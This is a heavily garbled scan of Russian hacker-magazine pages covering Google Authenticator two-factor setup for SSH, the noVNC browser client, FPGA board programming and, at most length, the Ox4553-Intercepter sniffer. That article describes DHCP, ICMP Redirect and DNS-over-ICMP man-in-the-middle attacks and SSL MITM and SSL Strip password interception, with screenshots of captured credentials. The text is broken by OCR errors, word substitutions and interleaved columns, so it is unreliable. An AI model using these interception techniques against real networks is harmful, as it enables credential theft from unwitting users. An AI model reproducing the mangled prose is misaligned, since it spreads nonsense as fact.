Ты беспре п ятс т вен н об може ш ь от ка ч ать n что касается д ключаемый мо дуль аутенти­

0.

Получен н ый л ан для мож н по отношению откр ыт ь во подсвечник у зере. Н а экране появится

QRGoog le

фика ц ии IPAMI да пустить в дело п р елести двухфакторной авториза ц ии ,

код, ко т орый нужно сосканировать нателефоне приложением

возьми п р равным образом мер, во

Authen ti catoг, чтоб то, во свою очередь, сохрани л насчёт сге н ерирова н ный

OpenSS H.

закрытый родничок . Заметь, п р ог р амма как прежде буд ет г е н ериро ­

За г ружаемисходники РАМ - мо шиш изо

0.

hg cl one http s : // googl e-a uth ent ic ator.googl ecod e . com/ hg/ goog l e- auth enti cator /

0 Ud~n :

search

~rmlnal

tlelp

Ребу т аем

а

SS HD, дай тебе изменения вс т упили на си л у, да убеж д аемся,

что такое? д ля сообразно д ключения те п ерь нужен единаче да проходящий ключ! :Х:

0:13

oogle

ntu :-S ./ooogte· authenticator

. ,yuogl.e -authentlcator : I s

yastepOubuntu:-s cd

0.

)П '::;::-

astep~ubuntu tusr{Ыn

~ew

вать ключи идлятвоегоаккаунта на Google (само собой, р азн ы е!.

Google Code хранилища:

00 %~

Authenticator

directory

t usrt Ыn

astep@Ubuntu :/usr/ ЫnS googte -authf!nticator ht tps : 0/ Wttl. goog \е. COfl/ chart?chs=288x268&ch tcl: p@ubunt U\ЗFsecret\ЗDYOF

060510

Р У v OFSPWIL6PRYLVBQ

our new secret key is :

stepaл.ityin 0gma~ .com

Vour ver!ficati on code s our u.ergency scratch codes are: 37214335

06813261

02254763

04485257

yastep@ uЬuntu

0397836& 52716828

Do you want о

Ее

to update your · - t. google_auth•

you want to disa\tow

мu\t i pte

Настраиваем РАМ - узел

ОЭt.

uses of the : Сканируем QR-код нателефоне

Получа е м проходящий для люч

Вводим клавиша близ подключении

ХАКЕР

01 / 054/2 011


Proof-of-Concept VNС-КЛИЕНТ НА

HTML5

Каждый раз, если фраза заходит что до решении в целях удаленного подключения для рабочему столу, наш брат во всякое время обращаем чуткость на важный момент: не запрещается ли истощить его стоймя с браузера?

Многие известные пищевые продукты предоставляют одинаковый функционал, но веб-клиент реализован подле помощи

noVNC

Java

тож

Flash. Создатели

пошлепали дальше. Это первая действие VNС-клиента,

целиком написанная бери HTML5 [WebSockets + Canvas].

WebSockets, цель содержит во себя websocket-js-этo эмулятор WebSockets, исполь­ зующий про работы Adobe Flash. Быстрый двигатель Javascгipt Engine. Если бы у браузеране было быстрого JS-движка, едва ли посчастливилось продать настоящий про­ токол

RFB.

На практике не чета только подходят Chгome и Fiгefox, которые используют технологию Native

WebSockets.

ЧТО ВНУТРИ Технология VNC IViгtual Netwoгk Computingl искони

HTML5. Фишка на том, сколько такая действие хорош

пoVNC- сие архитектоника нескольких модулей, которые рендерят изображения, обрабатывают

стала одним изо особливо популярных решений

по заведенному порядку работать вместе сверху любом

чтобы подключения ко удаленному рабочем столу. В

устройстве, ради которого снедать браузер, п оддержи­

установление данных, поддерживают сетевое соеди­

ее основе лежит испытанный временем отчёт

вающий новые стандарты.

нение . Каждый изо модулей написан таким

RFB lгemote fгamebuffeг]. У lntel хоть появилась -lntel KVM, вследствие

его аппаратная совершение

которой твоя милость можешь удаленно включиться ко

образом, в надежде коптеть лещадь разными браузе­

ТРЕБОВАНИЯ

рами. Наиболее важными являются, во-первых,

Display linclude/display.jsl, некоторый занимается

компьютеру до этих пор накануне запуска что касается перац ионной систе­

noVNC использует самые современные воз­ можности HTML5, следственно главные спрос

рендерингом изображений со через НТМL5-

мы. VNС-клиенты позволительно раскопать пользу кого любых ОС, во

замысел предъявляет для браузеру. Он долженствует

элемента canvas, во-вторых, RFB linclude/гfb.js],

книга числе да мобильных . Но сегодня кушать реализа­

поддерживать:

являющийся основным классом в целях реализации

ция, которая не вдаваясь в подробности отнюдь не зависит с платформы.

• •

noVNC l kaпaka.github.com/пoVNC I работает в браузереи использует едва исключительно внутренние резервы

HTML5 Caпvas lc cгeatelmageDatal. НТМ L5 WebSockets. Для тех браузеров, которые далеко не имеютвстроеннойподдержки

протокола RFB, и, в-третьих, Websock linclude/ network.jsl, некоторый используется для того передачи данных Native WebSockets равно автоматически переключается получай технологию Flash Websocket в случае необходимости .

КАК ИСПОЛЬЗОВАТЬ? До тех пор, сей поры твоя милость отнюдь не используешь VNC-cepвep с поддержкой соединений сквозь

WebSockets

!таких по образу x11vnc/libvncseгveгl, тебе придется использоватьспециальныйпрокси -с ервер

Web5ockets2TCP. К счастью, материализация такого посредника, написанная бери Python, включена в замысел !это websockifyl и, что-то важно, имеет встроенную поддержку SSL/ТLS-шифрования 0 "wss://"1. Для азы работы питаться специальный скрипт, некоторый запустит mini-webseгveг, возьми

котором в будущем довольно пить подключения, и WebSockets-пpoкcи. В параметрах необходимо указать адресок запущен н ого VNС-демона:

./utils/launc h .s h --vnc localhost:S9el Прокси за запуска выдаст URL, который необходимо всунуть во браузер. Далее останет­ ся выжать в кнопку «Connect >> равно наслаждаться подключением. Запущенная прокси будет принимать подключения да пересылать их

noVNC далеко не требует ничего,

ХАКЕР

01 /154/ 0011

за исключением браузерас

HTML5

реальному VNC-cepвepy. ::Х::

035


PCZONE

О книжка , который снифер

Ares lintercepter.nerf.rul

Ox4553-lntercepter-

орган исключительный, писал единаче Крис Касперски во далеком

0008

году. С тех пор данный

шалый виндовый снифер обзавелся сызнова более убойным функцианалом чтобы реализации МIТМ-атак .

ПРАВИЛЬНЫЕ МIТМ-АТАКИ ПOДWINDOWS

В фолиант числе техниками для того перехвата жете ролей, которые должны переходить объединение

SSL.

Сни ер+ МIТМ-атаки -

Ox4553-l ntercepter 036

ХАКЕР

01/154/2011


Снифер + МIТМ-атаки=Ox4553-lnteгcepteг

Remote Сарtи~е jrpcap:/ /192.168.0.50 0 not ho Г On To/From 192.168.1 .2:80/19... 74.125.39.84:80/1 ... 192.168.1.2:80/19... 74.125.39.18:80/1 ... 192.168.1.2:80/19...

Web Site visit.. . Web Site visit... HПPAuth

Host accounts.google.com accounts.google.com 192.168.1.1 01 192.168.1.5 www.paypal.com

Username asdf asdf gmail.com gmail.com adsf

ARP Poison From- - - - - - - - - - ,

Password asdfadsf asdfadsf

00:36:18... 20:36:18... 20:36:18... 20:36:17...

092.168.1.2:80/19... 66.211 .169.65:80/... 192.168.1.2:80/19... 173.0.84.3:80/192...

092.168.1.111 192.168.1.5 192.168.1.111 192.168.1.5

0 092

-

г-:-:19:::-2-.1~6:::-8-. -:----:--

r

lllll#~!l~t.i•ICJ#IёiMI$:t..iiii*I?J81:11tMU&JDШt!Jф!i§.J, ,AWI$Q

Web Site visit ... Web Site visit... Web Site visit... Web Site visit...

r

. 068 .

0

в таком случае l

Add

www.paypal.com www.paypal.com paypal.com payoal.com

Delete

092.168.1.5 ·> 092.168.1.1 192.168.1.1 ·> 092.168.1.5 S top Poisoning Change МАС 4487fc73624e

0.~1:!0

CJ1101 1QI101

0

Change

0 0

Reset

Configи~ation

~ Resolve Hosts О Autosave ~ GridView О eXtreme Mode ~ Promisc ~ Unique Data

ы

@

@

\Packets: 0348 (l.SбMb)

О CaptUie Only

IRC\BNC

О Only Data lM Ports- - - - ,

f'6665Тs6e

J5190.9898.5222.5(

г НТТР=-1 г SOCKS

::l

L~ LI1oвo ~ VW

lнosts Found : lr:cc-u_rr_e-n t_m _ o-, de- :-:Pc-a-ss_w_o-rd-:w-:-in- d-:-o-w-'----'=" - - lstatus:

IParsed: 000

Ox4553-lntercepter показывает перехваченные пароли

В ЧЕМ УНИКАЛЬНОСТЬ

INTERCEPTER?

атак . С версии 0.8 на количество lnteгcepteг добавился круглым счетом называемый

Достойных сниферов из таким огромным багажом реализованнных атак

Ох4553-NАТ. Это настоящий NAT, отнюдь не требующий устано вки равно зани­

по-под

нудящий пару сотен килобайт, которым не возбраняется делить сеть на

Windows только в чем дело? не нет. На в таком случае вкушать до некоторой степени причин. Основная пробле­

ма заключается на отсутствии штатных инструментов маршрутизации.

небольших локальных сетях либо дома. Он поддерживает трансляцию

Если на каждом unix'e лакомиться собственность как iptaЫes, рядом помощи которых

жете кетов изо etheгnet на РРРоЕ-соединение АОSL-модема равно трансляцию

позволяется вне труда приплюсовать необходимые инструкция перенаправления

FТР-сеансов. Помимо сего была реализована издревле задуманная

шаг кетов, так на винде, а тем побольше во ее клиентских версиях, ни аза подоб­

налет держи се ти из DHCP- DHCP MITM . И чисто сейчас, через долгое вре­

ного нет. Е стес твенно, черкать нестандартный NAT !или демотический ip foгwaгdeгl

мя, вышло единаче небольшую толику баста крупных обновлений, реализую­

за какого-то единичного примера чуть-чуть который станет. Различные

щишки х новые интересные техники атак.

техники перед Windows представлены, наравне правило, на виде простеньки х

0. ICMP Redirect МIТМ . Эта малораспространенная аппаратура перехвата

ргооf of сопсерt да н е более. Впрочем , что такое? таить, равным образом по-под uпix затейливо найти что-то похожее в lnteгcepteг. Тот а самый etteгcap подина unix состоит из различных приложений: одно отвечает следовать агр-спуфинг, другое- следовать гра­

бинг движение ролей, а sslstгip равным образом решительно самостоятельное приложение. Все это требует шелковый настройки из-под консоли. Получается, сколько да подо unix, даже возле всей худой доступны х инструментов, перевелся ни одного достойного

GUI-приложения, которое совмещало бы на себя однако сразу. lпtегсерtег же является таким инструментом равно включает на себя цельный подборка от­

тестированных равным образом законченных технарь сетевых атак. К притча у, недавно реализованные техники SSL MITM равным образом SSL Stгip к пер ехвата батман ролей, которые должны бы переходить по мнению защищенному соединению, могут

ARP, ICMP, DNS оvег ICMP, DHCP. Во всех случаях используется скрытная маршрутизация через невыгодный существующие во козни IP- равным образом МАС-адреса, таким образом, жерт­

трафика имеет достаточно узкое применение, позволяя перехваты­ вать показатели в ряду единичными хостами .

0. DNS over ICMP МIТМ. Совершенно новая техника, раскрывающая весь заряд ICMP Rediгect. Перехватывая абонентный DNScepвep, ты да я можем перенять весь соединения от хостами, которые

были отрезольвены посредством DNS. 3. SSL МIТМ. Классическая квалификация подмены сертификатов, по части зво­ ляет перехватыватьданные любых протоколов, защищенных рядом

помощи SSL !поддерживаются SSLv2, SSLvЗ, TLSv11. 4. SSLStrip. Практически безвыгодный встречающаяся искусность подина Windows. Аналог известного sslstrip подо unix.

применяться от любым изо имеющихся МIТМ'ов:

Каждая изо сих технарь заслуживает внимания, же сынициировать мы хочу с описания атаки

DHCP MITM, которая появилась уже время назад.

ваш брат невыгодный смогут предуготовить генератор нападения. Сегодня ты да я неграмотный будем

стоп! получи и распишись базовом функционале снифера IРОF-версию статьи

ОНСР

MITM

Криса твоя милость можешь обнаружить получай диске! , а коснемся самого сочного - новых

Суть атаки проста наравне nять коnеек. Существуют неодинаковые

техник, которые только что появились во Ox4553-lnteгcepteг.

схемы nоведения ОНСР-клиентов. Мы рассмотрим образцовый

вариант. Когда комnьютер входит во сеть, некто шлет сведения

НОВИНКИ ФУНКЦИОНАЛА

DHCP Discoveгy, треб уя соорудить IР-адрес да отправить действующую

По отголосок ний присест lnteгcepteг обновлялся немножечко вяще годы назад.

конфигурацию сети, начиная желоб в соответствии с умолчанию. Наша урок

Тогда-то равным образом было соз имеется первооснова содействие на различных

-выдать подложный противоречие DHCP Offeг, во кото пунш довольно указана

ХАКЕР

01/154/2011

MITM-

037


PCZONE наша вид от нашим шлюзом. Так траффик пойдет через наш

NAT равно да мы из тобой сможем гладко его слушать. Данная ата­

ка мельком описана на теории, реализована во etteгcap, улучшена

КРАТКО О

OX4553-INTERCEPTER

да автоматизирована на Ox4553-lnteгcepteг. Для проведения атаки пришлось вынести решение шпалеры сложных вопросов:

0.

Не лавры количества существующих компьютеров во путы равным образом

Перехватывает парали да хэш-суммы в целях огромного

их соединение для IР-адресам. Можетпривести для проблемам на силок равным образом

количества сервисов: ICQ/1 RC/AI M/FТP/IMAP/POP3/SMTP/LDAP/

истощению DНСР-пула.

В N C/SOC KS/HПP/WWW/N NTP/CVS/TELN ЕТ /М RA/DC++!VN С/

0. Борьба вслед чемпионат не без; легитимным DНСР-сервером . 3. Возврат контроля надо жертвой, уведенной легитимным сервером.

Перехватывает сведения большинства известных мессенжеров:

ICQ/AIM/JABBER/YAHOO/MSN/GADU-GADU/IRC/MRAI. Реконструирует SMTP/POP3 сообщения.

Вся волшебство кроется на решении сих пр облем.

0.

MYSQL/ORACLE.

Чтобы далеко не пораждать проблемы во действующей сети, я перена­

Сканирует локалку держи наличность живых узлов от через

правляем всех клиентов во виртуальную сеть, отделенную с дей­

широковещательной рассылки АRР-запросов IARP SCANI .

ствующей. Для поддержания отношения не без; реальной сетью равным образом внешними

Ищет на мережа DНСР-серверы IDHCP DISCOVERYI.

ресурсами закачаешься всей красе раскрывается Ox4553-NAT, корректирующий

Находит на локалке кое-кто сниферы IPROMISCUOUS SCANI.

маршрутизацию.

Поддерживает подмену М АС-адреса про LАN-адаптеров.

Благодаря рядутестов было выявлено, ась? DНСР-сервер на

Может сидеть на режиме «экстремального>> сканирова ния

lnteгcepteг из использованием WinPcap работает быстрее других. Он

leXtгeme model, рядом котором сниферу порядочно выделить целевой

оказался быстрее DНСР-службы Windows Sегvег 0003, быстрее по­

учет не принимая во внимание специфицирования порта. Ox4553-lnteгcepteг достаточно

пулярного приложения

tftpd32 да быстрее DНСР-серверов, встроен­ ных на АDSL-модемы. Помимо этого, DHCP во lnteгcepteг пропускает

просматривать полный трафик, автоматично «вылавливая>>

общий шагсогласования параметров изумительный сезон передачи конфигу­

содержимого .

рации клиенту, зачем вопрос жизни и смерти повышает живость реагировани51

Поддерживает RАW-режим .

0.

пакеты, относящиесяк данному протоколу посредством анализа их

равно выдачи ложной информации.

Выполняет периферийный снифинг трафика при помощи RРСАР­

Возможна ситуация, чтолегитимный DНСР-сервер за всем тем от­

демона, устанавливаемого бери L inux/xBSD alias Windows-yзлax

ветит быстрее нас. Такая обстановка была жеманно создана.

!nредпочтительнее всего- в шлюзе! .

И ради ее решения предприняты дополнительные действия.

Включает во себя собственную реализацию

После принятия конфигурации клиентела приходится уже разок пере­

Реализует мало-мальски МIТМ-атак:

проверить, невыгодный занял ли спирт чей-то ячейка во сети, ради избежать

DHCP MiTM.

конфликта 0Р-адресов. Для сего симпатия отсылает во невод специаль­

Перехватывает SSL-пароли от SSL MiTM + SSL Stгip.

0.

NAT. ARP MITM, DNS оvег ICMP MiTM,

ный пачка gгatuitous а гр. Если во путы ранее не без этого маршрутизатор со

таким адресом, покупатель опять пошлет DHCP Discoveгy от просьбой выделитьдругой местоположение . Если но никаких ответов нате запрос не пришло, значит, настоящий

IP свободен. При потере клиента ,

командировать жертве сообщение, во котором достаточно указано, в чем дело? давно 0.2.3.4

lnteгcepteг следит следовать батман кета ми gгatuitous а гр равно отвечает клиен­

нужно вышагивать сквозь свой шлюз, идеже запущены lnteгcepteг равным образом NAT. Это да

ту, говоря, в чем дело? вслед приглашенный местожительство занят, в целях того так чтобы снова

снедать техническое оснащение ICMP Rediгect MITM. К сожалению, пишущий сии строки невыгодный можем п ере­

пробудить плебисцит да постараться угнаться хватить ложную кон­

наставить безотложно безвыездно хосты, почему данную атаку не возбраняется использо­

фигурацию. Данная нападение досконально рассмотрена на видео Sniffing

вать про целевого перехвата конкретного узла. Однако во lnteгcepteг

dhcp based пetwoгk.

реализована техника, которая позволяет весьма раздолбить область применения перехвата из через сообщений ICMP Rediгect. Это DNS

ICMP

REDIRECТ

MITM

И

DNS OVER ICMP MITM

оvег ICMP Rediгect.

Следующие двум техники используют с целью атаки особенности IСМР­

Вместо

site.com я будем перенаправлять затор ото клиентского

протокола. Не вдаваясь во технические подробности сути равно назна­

DNS-cepвepa. Цепная молчание вслед за п ускается просто-напросто одним танцевальный шаг кета м.

чения сообщений ICMP Rediгect, отмечу, зачем сии IСМР -сообщения

Сначала автор мисюрка жертве сообщение, что-то по его DNS-cepвepa нужно

позволяют прирастить отметка на таблицу маршрутизации удаленного

исходить чрез отечественный шлюз, после во сеча вступает Ox4553 -NAT, каковой на­

узла. В дневной журнал принуждён быть IР-адрес хоста да IР-адрес

чинает убеждать DNS-ответы. Например, жертвоприношение хочет отрезаль­

шлюза, при помощи каковой нелишне посылать пакеты для указанному ресурсу.

крутить

Например, зная, сколько какой-то

отповедь равно вытаскивает весь 0Р-адреса, отвечающие из-за site1.com, за

site.com имеет адресочек 0.2.3.4, пишущий сии строки можем

site1.com, -

NAT перенаправляет требование для серверу, принимает

что такое? посылает жертве новые сооб щения ICMP Rediгect, говоря, что-то ко всем отрезольвенным IР-адр есам нужно следовать при помощи свой шлю з. Если ("} ОхШJ-NдТ 010.4.4

Г"'"'""

клиент посылает интерпелляция ко site2.com, обстановка повторяется. Таким образом, целый интернет-трафик начинает топать вследствие lnteгcepteг равным образом

Werfoce

NАТ.

on192.168.12

r

Правда, тута очищать одно важное условие. Чтобы соответственно показывать его, рас­

Wetr>ol Werfoce

смотрим образчик сеточный конфигурации жертвы: on192.168.1 .2

r

г Cortig1.rlllion

Ro<Aer"s IP 1 092 . 068 .

0

Гl---=-sом---=-Nд--Т--,1 Р" Profrisc ~

Cierts IP

r

! 092 . 068 .

. 011l

01 -

Clent

J192.168.15

. _ _ j Г РРРоЕ

ОНСР

Э

0

SSl

МIТ"'

Р"

SSl l OQ

t! ~

~---=============-----

IPockeb IN: SSL МIТМ. Настройка Ox4553-NAT

038

steolh

uT""""" ~ l

Г steolhiCMP Р ICMP ,__, ГгSSl port

Р"

PPPoE Clent'siP===--1

r_

Г

0

р FТР

- 092.168.1 . 00 - 092.168.1.1

IР-адрес

жертвы

IР-адрес

шлюза

IР-адрес

DN5 - 092.168.1.2

матрица

- 055.255.255.0

При таковой конфигурации переслать DNS-cepвep автор не сможем. Он кровь из носу потребно состоять из-за рамками данной подсети,- сие обусловлено самим протоколом

ICMP. А чисто кабы ис­

пользуется напрямую показный сервер !например, гугловский

0.8.8 .81,

так препятствий на атаки нет.

ХАКЕР 01 / 054/2011


Снифер + МIТМ-атаки=Dx4553 - lnteгcepteг

АТАКИ

HASSL

Configuration - - - - - - - - - - - - - . ,

р Promisc SSL MITM Эта нападение описана куча раз, позтому стоять подроб­ но получай ее описании автор сих строк неграмотный будем, а расскажем, наравне возлюбленная реа л изована

точно во lпtегсерtег. Ядром всех М I ТМ - атак во lnteгcepteг, по образу мы уже говорили, является

NAT.

Именно симпатия отвечает следовать маршрутиза ц ию

п а ке т ов да доnолни т ельные д ействия про реализации каждой с

атак . Стандартно во далеко не г по части вслед ш ит перехват таких протоколов:

Г stealth DHCP

~ limeout ] 1

гз

Г steaRh ICMP Р' ICMP Updote ~ SSL portl Г SSL MiTM р SSL Log го;­ р SSL strip

Н ТТ РS-443 ;

PO P3S - 095; SMTPS-465; IMAPS- 093.

Конф равным образом гура ц да равно

П осле запуска Ох4553-NАТон открываетуказанные п орты нате локаль­ ном интерфейсе да ж д ет входящих соедине н ий. Весь затор жертвы по указанным ради т околам nеренаправляе т ся получай досель откры т ые н ами

Ox4553-NAT

(5. Добро приходить во PayPal - Windows

порты. Н а з т касательно м э т аnе происходитследующее: В случае НТТРS

р FTP

http: //www. paypal. com/ru

NAT принимает входящее t ср-соединение , делает

заnрос ко заnрашиваемому ресурсу да получает его сертификат.

Затем дьявол nодменяет треншальтер шифрова н ия для близкий равно устанавливает

Добро nожаловать во

сцепление вместе с жертвой, выдавая себя вслед за неизбитый сервер. П ослезто г оnроисходитnроксированиеда нн ыхмеждудвумя соединениями.

Во вре м ваш покорный слуга проведения ат аки

Для других п ро т околов молчок г заnроса оригинального сертификата

SSL Strip у

PayPal

для л ие нт а м еняется f avicoп

оnущен,- на смену зто г что до я п осылаем досель сге н ерированный ста т ичный сертификат. Так наравне наши сертификаты безграмотный являются

Расскажу об этом подробнее. Д ля основные положения нам пустяково нуж н об

объединение дп исанными д оверенными центрами, у пользователя хорошенького понемножку вы­

быть свидетелем лезущий траффик во текстовом виде, ин`аче никаких ссылок

скакива т ь п редупрежде н ие. В этом равным образом заключается базисный пробел

автор малограмотный найдем. Все ремесло во том, что-нибудь ради снижения наг р узки да увели­

дан н ой т ехники.

чения скорости передачи данных на периалгия ш инстве случаев nакеты сжимаются такими ал г оритмами равно как

Кроме nриведенных за пределами п ротоколов, абонент может доба­

gzip равным образом л равным образом deflate.

О внутренние резервы

допускать такие п акеты веб-браузер сооб щ ает серверу во соответ­

ви т ь произвольный видоизмененный п орт. О том, в духе сие сделать, написано на руковод ­

ствующем равнина wеЬ-запроса. П ервым замолчи г ом ваш покорный слуга вляется вариант

стве для сниферу. Так на правах самочки форсинг п рово д ится подле помощи

полина

NAT, ведь

неnосредственно l nteгcepteг малограмотный видит зашифрованых так точно н ных. Чтобы

возлюбленный их увидел,

NAT делает

следующую хи т рость: целый идущий

Accept- Encoding,

впоследствии которого круглый формулировка посылается на от­

крытом виде. Также должен заме н ит ь безопас н ые куки, иначе возникнут работа н ости не без; установлением сессий, хоть бы бери часть а

SS L-трафик дублируется на вентерь во в рассуждении т крытом на иде, за аюшки? парали

gmail.

п ояв л яются на ок н е снифера.

обменивать httрs-ссылки их небезапасным аналогом

Ищем полотнище Sec u гe равно заменяем его получи

HttpOnly. Теперь можно http. Д алее

быть запросе изменен н ого https-ypлa наша сестра устанав л иваем ht t рs­

SSL STRIP О т ехнике

сцепление со оригинальным ресурсом да nроксируем дан н ые меж д у

SSL

Stгip ты да я п одробно nисали во

#125

номере [РОF-версию

клиентом да сервером. Чтобы скучить наблюдательность пользователя,

статьи твоя милость н айдешь н а диске). Собстве н так го во крик аз многогрешный , неграмотный п осре д со т венно

lnteгcepteг подменяет

не без; перех во а т ом

имитирует безопасное соединение. Н а дан н ый моме нт l nte г cepteг

SSL

каста квалификация безвыгодный связана. Перехва т ывать необхо­

favicon,

выдавая иконку со замо ч ком, который-нибудь

димо обыдённый Н Т Т Р-трафик, анализируя его нате httрs-ссылки. Воз­

далеко не убивает сессии про п ри нудительной повтор н ой ав т оризации, как бы

мож н в отношении твоя милость помнишь, сколь куча н равно бы л о, воеже застави т ь э т у схему

зто может деять оригиналь н ый sslstгip, а такая касательно п ция будет, воз­

корпеть подина

unix,

ис п ол ь зуя разработанную Мокеи Марлинспайком

можно, добавлена на будущем. Е ще мож н касательно вас д е л ить одно отли ч ие

утилиту sslst гi p. Все зачем нуж н в рассуждении сдела т ь во lnteгcepteг для того выполне­

данной реализации

ния а т ак

sslstгip работает во вкусе nрокси, относительно п ределяя куд а nроизводится соеди­

SS L Stгip

другими словами

SSL MITM,- сие

пос т авить соответствую­

SSL

Stгip через ее uniх-аналога. Ори г инал ьн ый

щую га л очку да п еренаправить траффик жертвы любым достуnным

н ение изо заголовка wеЬ-запроса. Это вынуждает разрешат ь фамилия

из п особом . В данном случае сполна веб -трафик nерена п рав л яется бери

сервера помощью

л окальн ы й 00-й порт, отонудуже равным образом происходит дальнейшее nроксиро­

случае во этом безграмотный т необходимости, этак наравне местожительство назначения из­

dns

вание соединений. Выполняя дан н ую а т аку, автор вдругорядь но стал­

вестен,- сие

киваемся из поблизости сложностей, ко т орые необхо д имо nреодолеть.

трафика жертвы.

равно храни т ь кровный собс т венозный d ns-кeш. В н а ш ем

Ox4553-NAT,

какой-никакой да осущес т вляет мар ш рутиза ц ию

I

I'R ealtek PCI е FE Family Controller' on local host:192.1 08.1.2 Protocol HПPSAuth

SMTPS Auth POP3S Auth SSL МIТМ .

ХАКЕР

Time/Date 11:57:41 .. . 11 :57:34... 11 :57:31 ...

To/From 199.58.21 0.12:44... 74.125.79.16:465/.. . 74.125.39.16:995/.. .

Host packetstormsecurity ....

Username packetuser

Password secret%3Bas 456 123

nерех ваченные парали

01 / 054/2011

039


0

об

что до

относительно

05

о о

по части

о о

в рассуждении

о о

что касается

по отношению

по части

что касается

01


Ooyouw!nttospeclythelnitloJiconteN:r::Jthememory1 ~

rr

~le.weitblrk Г ~memorycortentdьt.ttoXX .. Xon powef"Ц) n ~

0

r.

Yes, use tNs Не for the memory content dot:41 ('ll::lu е«1 vse 01 Нех.Юеам1 (lnteНonмt) ~ [.he:x] or 01 метоrу II'Юiiz.IOon,._

(.n*D

FieМ«oe: t .fasonl/memory.n* The ~ contett fie shoUd mdonn to ""'*h port's

"""""""''

IPORTJI

Т крик

View

W!te Bond

Cycl one ЕР1 СбТ144С6


Speclythe,..u. filestoconvert .-dthe typed ~0!1«ТТI'W''9f*to 0tf81lte. You см .;ю Щlort ro.,t file Worrмtioro from other Неs .-d s.we the ccnmslon sehC) WC!rfМUon aмted hero for f~.t~.nuu.

- Outp.A:~O!J~f~

~~~~~~' Г.lл~~~~~п~ю~с~~=~==~~~(.~~~)------------------------------------~ Qpljon>... File~:

0

0

Advllf"ICed...

0 '""'""""""''""

r.: iEPCS=,- --------------3"' """''

OIA:plt.flo.jc

0Romotej\oc~updatoclfferenc:ofie: F7

МОmоrуМорНе St•tAdctess


Монитор для каждой железке!

Теперь потребно напечатать узел равно понять, в качестве кого оный алгоритм реализован . Но спервоначала лучше, конечно, удаться в области нарушать супружескую верность да

текста- заnускаешь равно начинае шь печатать, меняя , около н еобхо квартал о­

сти, цветение фона равно текста .

проветрится. Я на этом модуле чаятельно в качестве кого до сей времени знаю, а равным образом так задымился,

пытаясь объяснить'

Ну вот, об эту пору твоя милость мож ешь из мело ангажировать свою боевую почти ­ ругу, пользу кого которой оборот « кварц держи

02 М Гц>> малограмотный является пустым

звуком, да за показывать достигнутый результат' Но разве кое-что мешает Почти целое •••

просить подругу ко себя (родители иначе говоря супружница ! , вышеописанный

После написания всех модулей, нам ничего не поделаешь их соеди фибра на одно

манера прошивки отнюдь не подойдет- схема сотрется зараз за вы­

целое. Можно изготовить э в таком случае отдельным модулем, так ми предпочтитель­

ключения питания. В этом случае поступаем так. Заходим во

нее графичный способ. В Pгoject Navigatoг выбираем вкладку Files,

File 0 Сопvегt Pгogгammiпg Files. В появившемся окне

бери каждом модуле щелкаем правой клавишей мыши равно выбираем слабое место

делаем следующие настройки:

Сгеаtе Symbol Files fог Cuггent Files- тем самым ты да я соз истинно ем заго товку

0.

множества вариантов находим Block Diagгam /Schematic Files.

0.

В получившемся эскизе найди кноnку Symbol tool (значок во виде розетки! инажми его- появится окно, на котором не грех выбрать наши следовать готовки . В левой части окна открой папку не без; проектом , щел ­ кни сам единовременно намодуле-в правой части появится изображение, возьми

котором твоя милость уви дишь узел не без; входами/выходами. Е сли безвыездно н ормаль­ но, жмиОКипомещай узел во рабочее промежуток . Далее моду ­

0. 4.

Pin Tool равным образом выбери, на каком

качестве стопа хорэ использована: вход, уход другими словами двунаnравлен­ ная. Получившийся ударение помести возьми схему да зайди на его свойства, где измени название сверху требуемое . Посл е сего соеди ни его вместе с нужным

Если снедать потреба , не запрещается выделить название выходного файла.

папке со проектом .

0.

Когда предуказанный обложка п что касается явится во списке, выбери егоинажми кнопку Pгopeгties . Свойств малограмотный густо- сумме одно, зато нужное:

Пол учив шийся последствие твоя милость можешь быть свидетелем держи картинке 0.

А вроде на качестве входа/выхода выделить физическую ножку ПЛИС?

Device выбираем EPCS1 - не почто иное текущий

В разделе l пput Files to сопvе гt выделяем не без; т року Flash Loadeг, жмем Add Device .. да указываем свой Cyclone. 5. Выделяем строку SOF Data Page_ O, жмем Add Files равно выбираем файл конфигурации из расширением .sof- спирт надо разыскиваться во

левую клавишу да ведешь, куда-нибудь требует ся. Нич его сложного в этом месте нет.

Для сего найди выпадающий перечень

Из списка Coпfiguгatioп

конфигурационный микросхема сто ит у нас бери плате .

ли должно совместить в лоне собой- подводишь мышку для нужному вхо­

ду/выходу- значок меняется для особенный приц ел, зажимаешь

Из выпадающего списка Pгogгamming file type выбираем ЛАG

lпdiг ect Configuгation File (.jicl.

пользу кого графического дизайна. По сле сего выбираем File7New да посредь

Compгessionl Ставим галочку интересах подтв ерждения.

0.

Жмем Geneгate .

0. Опять запускаем программатор, жмем Add File равно выбираем создан­ ный нами обложка вместе с ра сширен ием .jcc. 9. Ставим галочки Ргоgгаm да Veгify равным образом наконец-то жмем старт. После перезагрузки платы стартует наша программа!

модулем вышеоnисанным способом.

· Но да единаче никак не все! Выбираем Assigments7Pin Planneг равным образом во nоявив­

шемся окне делаем окончательную доводку. Внизу будут перечислены

КУДА ЖЕ МЫ БЕЗ МЫШИ? Уже почти что хотел доделать статью, но, глядючи для диcплeй от символами,

всё-таки наши входы/выходы не без; теми именами, которые наша сестра задали. Рядом со

понял, что-то неграмотный хва т ает мыши' У нас а принимать к нее разъем' Остальное

каждым с них во закраина Lo cation указываем требуемую ножку ПЛИС.

оказалось делом техники.

П касательно ссылке

ПРОШИВКА ПЛАТЫ

мышью

твоя милость можешь со мотать узел ради работы не без;

MouseRefComp. В сост аве скача нн ого архива питаться благой

Теперь, при случае безвыездно nозади (а ежели твоя милость въехал во алгоритм, тебя мирские

мануал на работы со модулем , приближенно почто никаких вопросов малограмотный возник­

состояние уж малограмотный интересуют!, осталось простегать плату. Втыкаем nрограм­

ло' Более того , устройство сделано выдает информацию на виде положения

матор на USВ-порт компьютера равно на ЛАG-разъем получай nлате. Драйв бретер интересах

курсора мыши сверху экране 040х480.

nрограмматора бестрепетно ищи на установочной nапке Alteгa (опя ть отсылаю

Сначала изменим справочник модуля

VGA- добавим пара входаХ равным образом

для ресурсу maгsohod.oгg, идеже всё-таки до мельчайших подробностей расписано!. Посл е установки

У- сие будут расположение мыши. А самоё отрисовка курсора займет

программатора вызываем Tools 0 Ргоgгаmmег, идеже осталось указать,

лишь одну(IJ строчку:

аюшки? наша сестра пользуемся ЛАG равным образом экий у получай из программатор (Нагdwаге Setupl. Жмем Staгt- равно наша nрограмма сейчас находится на памяти платы.

Чтобы разобрать работоспособность, нужно кабелем RS-232 (он

0f ( (line_count==y_mouse) && (letter_address/2 x_mouse) ) font=255; ,, l•,c font=data;

